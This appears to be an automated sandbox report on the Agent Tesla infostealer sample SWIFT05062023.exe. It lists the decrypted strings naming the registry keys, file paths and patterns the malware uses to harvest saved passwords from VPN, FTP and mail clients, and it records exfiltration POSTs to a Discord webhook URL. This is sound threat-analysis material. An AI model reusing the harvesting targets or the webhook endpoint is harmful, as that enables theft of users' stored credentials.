                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: user.config
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: //setting[@name='Username']/value
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: //setting[@name='Password']/value
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: NordVPN
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: -
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Private Internet Access
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: %ProgramW6432%
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Private Internet Access\data
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ProgramFiles(x86)
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Private Internet Access\data
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \account.json
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: .*"username":"(.*?)"
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: .*"password":"(.*?)"
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Private Internet Access
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: privateinternetaccess.com
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: FileZilla
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: APPDATA
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \FileZilla\recentservers.xml
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: APPDATA
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \FileZilla\recentservers.xml
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <Server>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <Host>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <Host>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </Host>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: :
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <Port>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </Port>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <User>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <User>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </User>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <Pass encoding="base64">
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <Pass encoding="base64">
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </Pass>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <Pass>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <Pass encoding="base64">
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </Pass>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: CoreFTP
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PW
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: User
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Host
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Port
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: hdfzpysvpzimorhk
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: WinSCP
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: HostName
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: UserName
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PublicKeyFile
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: :
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PortNumber
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 22
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: WinSCP
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: A
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 10
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: B
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 11
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: C
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 12
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: D
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 13
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: E
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 14
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: F
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 15
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ABCDEF
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Flash FXP
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: IP
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: :
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: port
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: user
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: pass
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: quick.dat
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Sites.dat
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \FlashFXP\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \FlashFXP\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: FTP Navigator
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SystemDrive
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \FTP Navigator\Ftplist.txt
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Server
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: No Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: User
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SmartFTP
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: APPDATA
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: WS_FTP
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: appdata
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: HOST
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: UID
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PWD
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PWD=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PWD=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: FtpCommander
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SystemDrive
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SystemDrive
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SystemDrive
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \cftp\Ftplist.txt
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ;Password=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ;User=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ;Server=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ;Port=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ;Port=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ;Password=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ;User=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ;Anonymous=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: :
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: FTPGetter
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \FTPGetter\servers.xml
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <server>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <server_ip>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <server_ip>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </server_ip>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: :
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <server_port>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </server_port>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <server_user_name>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <server_user_name>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </server_user_name>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <server_user_password>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: <server_user_password>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: </server_user_password>
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: FTPGetter
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: The Bat!
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: appdata
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \The Bat!
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Account.CFN
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Account.CFN
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: zzz
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Becky!
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: DataDir
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Folder.lst
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Mailbox.ini
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Account
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PassWd
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Account
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SMTPServer
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Account
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: MailAddress
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Becky!
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Outlook
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Email
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: IMAP Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: POP3 Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: HTTP Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SMTP Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Email
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Email
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Email
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: IMAP Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: POP3 Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: HTTP Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SMTP Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Server
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Windows Mail App
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 1
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Email
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Server
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SchemaId
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: pResourceElement
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: pIdentityElement
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: pPackageSid
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: pAuthenticatorElement
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: syncpassword
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: mailoutgoing
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: FoxMail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Executable
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: FoxmailPath
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Storage\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Storage\
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \mail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \mail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Accounts\Account.rec0
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Accounts\Account.rec0
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Account.stg
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Account.stg
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: POP3Host
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SMTPHost
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: IncomingServer
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Account
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: MailAddress
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: POP3Password
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 5A
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 71
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Opera Mail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: opera:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor:
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: PocoMail
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: appdata
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Pocomail\accounts.ini
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Email
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: POPPass
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SMTPPass
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SMTP
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: eM Client
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: eM Client\accounts.dat
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: eM Client
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Accounts
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: "Username":"
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ",
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: "Secret":"
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ",
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: "ProviderName":"
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: ",
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: o6806642kbM7c5
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Mailbird
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: SenderIdentities
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Accounts
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: \Mailbird\Store\Store.db
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Server_Host
                Source: 0.2.SWIFT05062023.exe.16f11dafe48.1.unpackString decryptor: Accounts
                Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49695 version: TLS 1.2
                Source: SWIFT05062023.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: CEMENT.pdb source: SWIFT05062023.exe, 00000000.00000002.540183808.0000016F00077000.00000004.00000800.00020000.00000000.sdmp, SWIFT05062023.exe, 00000000.00000002.542043646.0000016F708F0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: NMkLiJJ.pdbBSJB source: SWIFT05062023.exe
                Source: Binary string: NMkLiJJ.pdb source: SWIFT05062023.exe

                Networking

                barindex
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49695 -> 162.159.137.232:443
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
                Source: global trafficHTTP traffic detected: POST /api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLvX6trIkig77Yg2Nm1avTr9 HTTP/1.1Content-Type: multipart/form-data; boundary=----------eeaef95b509b45a590275f60ce750e22User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1168Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /api/webhooks/1114977540709289984/k4SQohEZgHj3IRvaJBioKCVlTv-1sy0NPHEWl2GHdoz5JLvX6trIkig77Yg2Nm1avTr9 HTTP/1.1Content-Type: multipart/form-data; boundary=----------658f909b118b4ef2b71a26c0fc5e5610User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1954Expect: 100-continue
                Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                Source: SWIFT05062023.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: SWIFT05062023.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: SWIFT05062023.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: SWIFT05062023.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: CasPol.exe, 00000001.00000002.803904437.000000000656A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: SWIFT05062023.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: SWIFT05062023.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: SWIFT05062023.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: SWIFT05062023.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: SWIFT05062023.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: CasPol.exe, 00000001.00000002.800774951.00000000036B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
                Source: SWIFT05062023.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: SWIFT05062023.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: SWIFT05062023.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: SWIFT05062023.exeString found in binary or memory: http://ocsp.digicert.com0X
                Source: SWIFT05062023.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
                Source: SWIFT05062023.exeString found in binary or memory: http://s.symcd.com06
                Source: CasPol.exe, 00000001.00000002.800774951.00000000036A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SWIFT05062023.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                Source: SWIFT05062023.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                Source: SWIFT05062023.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                Source: SWIFT05062023.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: CasPol.exe, 00000001.00000002.800774951.00000000036D7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.800774951.00000000036D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1114977416134279200/1115663127888011334/user-226546_2023-06-
                Source: CasPol.exe, 00000001.00000002.800774951.0000000003754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1114977416134279200/1115663130656251924/user-226546_2023-06-
                Source: SWIFT05062023.exeString found in binary or memory: https://d.symcb.com/cps0%
                Source: SWIFT05062023.exeString found in binary or memory: https://d.symcb.com/rpa0
                Source: SWIFT05062023.exeString found in binary or memory: https://d.symcb.com/rpa0.
                Source: CasPol.exe, 00000001.00000002.800774951.00000000036A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
